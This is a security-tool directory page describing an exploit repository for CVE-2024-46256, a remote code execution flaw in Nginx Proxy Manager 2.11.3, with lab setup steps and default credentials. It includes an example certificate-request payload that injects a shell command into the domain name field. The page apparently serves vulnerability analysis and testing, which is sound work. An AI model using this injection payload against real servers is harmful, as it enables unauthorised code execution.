Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2024-46256 — CVE-2024-46256 tool | Kitploit
Tools/GitHubGitHub/kimtangker/cve-2024-46256
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubkimtangker/cve-2024-46256

CVE-2024-46256

CVE-2024-46256 tool

View Repository
810 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2024-46256 Nginx Proxy Manager RCE Vulnerability Analysis

Environment Setup

1. Running Nginx Proxy Manager 2.11.3 Environment

root@kitploit:~

docker-compose up -d

Or you can use the automated script:

root@kitploit:~

python setup_environment.py

2. Accessing Nginx Proxy Manager

  • URL: http://localhost:81

  • Complete the initial setup before proceeding with testing

  • Log in with the default admin account (Email: [email protected] / Password: changeme)

  • Verify access to certificate issuance related features

Vulnerability Information

  • CVE ID: CVE-2024-46256

  • Product: Nginx Proxy Manager

  • Version: 2.11.3

  • Vulnerability Type: Remote Code Execution (RCE)

Download Tool
  • CVSS: High

  • PoC Code

    The PoC triggers RCE by injecting templates/commands in the domain name field during the certificate issuance request (e.g., Let's Encrypt) by an authenticated user.

    Example payload (conceptual example):

    root@kitploit:~
    {
      "domain_names": ["test.com\"||{command}||\\n test.com\""],
      "meta": {
        "dns_challenge": false,
        "letsencrypt_agree": true,
        "letsencrypt_email": "[email protected]"
      },
      "provider": "letsencrypt"
    }
    

    Analysis Environment

    • OS: Windows 10

    • Docker: Latest version

    • Nginx Proxy Manager: 2.11.3